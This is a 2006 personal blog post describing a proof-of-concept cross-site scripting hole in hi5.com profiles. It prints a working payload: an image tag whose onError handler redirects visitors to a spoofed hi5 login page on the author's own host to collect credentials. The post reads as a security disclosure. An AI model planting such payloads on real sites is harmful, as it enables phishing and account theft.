start > 2006-01-15 > 1
Hi5 and XSS Part II
labels
| Category: | security |
Hi5 and XSS Part II 
Well I've just written a proof of concept on 
my hi5.com profile. You need a valid login! While loading my profile, you'll auto-magically be redirected to a spoofed hi5.com page at my webserver, I won't save the information you input, but I suggest you to enter only testing info to try it out!For the interested the proof of concept is the following:
<img src="" onError="location.replace('http://pabrantes.dyndns.org/www.hi5.com/friend/displayMyProfile.html');">
Since no image will be loaded an onError event will be generated, and automatically the user will be re-asked to relogin, but in the fake page! Since it's not unusual to be asked to relogin at hi5.com there's a potential danger for users to disclosure their information!
2 comments (by ras, pabrantes) |
post comment
Who am I?
My name is Paulo Abrantes AKA pabrantes and I'm a software developer. I'm currently employed at CIIST working as a Java developer in FenixEDU.This blog is mostly about Java programming, domain driven design and snipsnap bliki developing. Everything written in this blog is my personal opinion and it may not reflect the opinions of my employer and co-workers.
Blog subscription
My name is Paulo Abrantes AKA pabrantes and I'm a software developer. I'm currently employed at CIIST working as a Java developer in FenixEDU.This blog is mostly about Java programming, domain driven design and snipsnap bliki developing. Everything written in this blog is my personal opinion and it may not reflect the opinions of my employer and co-workers.
Blog subscription
Links
Home
Paulo's Profile
Post History
Add to Technorati Favorites
Paulo's Photo Gallery
WishList
Posting without Login
Lon3wolf's Blog
MANOWAR's Blog
Max's Blog
Jff's Blog
João Ferreira's Blog
Moon's Blog
Rui's Movie
Blog
Balhau's Blog
Recent PostsJava Programming: Bytecode Injection
Intermission: Sorry For Downtime
Software Developing: Studying The Bliki Domain Model
SnipSnap Developing: Trying to settle a roadmap
System Administration: Load Balancing with Apache
Blogging: Two years have passed
Software Developing: The SnipSnap Saga
Java Programming: Getting your code spicy with Groovy
Software Developing: Fluent Interfaces
Software Developing: Implementing a ShoutBox on SnipsSnip
Software Developing: SnipSnap, SnipIt and SnipSnip
Java Programming: Proxies and Access Control
Java Programming: Proxies and References
Java Programming: References' Package
YALM: Yet Another Layout Modification
For older posts, please refer to post-history for a complete Post History
… and 17 Guests.
Home Paulo's Profile Post History Add to Technorati Favorites Paulo's Photo Gallery WishList Posting without LoginSearch Blog
Fellow Bloggers
Lon3wolf's Blog MANOWAR's Blog Max's Blog Jff's Blog João Ferreira's Blog Moon's Blog Rui's Movie
Blog Balhau's BlogIntermission: Sorry For Downtime
Software Developing: Studying The Bliki Domain Model
SnipSnap Developing: Trying to settle a roadmap
System Administration: Load Balancing with Apache
Blogging: Two years have passed
Software Developing: The SnipSnap Saga
Java Programming: Getting your code spicy with Groovy
Software Developing: Fluent Interfaces
Software Developing: Implementing a ShoutBox on SnipsSnip
Software Developing: SnipSnap, SnipIt and SnipSnip
Java Programming: Proxies and Access Control
Java Programming: Proxies and References
Java Programming: References' Package
YALM: Yet Another Layout Modification
For older posts, please refer to post-history for a complete Post History
Recently Changed
beautisgift01@yahoo.com
Java Programming: Bytecode Injection (pabrantes)- Java Programming: Bytecode Injection (m4ktub)
- Java Programming: Bytecode Injection (pabrantes)
- Java Programming: Bytecode Injection (m4ktub)
Java Programming: Bytecode Injection - Intermission: Sorry For Downtime
- Software Developing: Studying The Bliki Domain Model (pabrantes)
- Software Developing: Studying The Bliki Domain Model (jff)
- Software Developing: Studying The Bliki Domain Model (pabrantes)
Logged in Users: (0)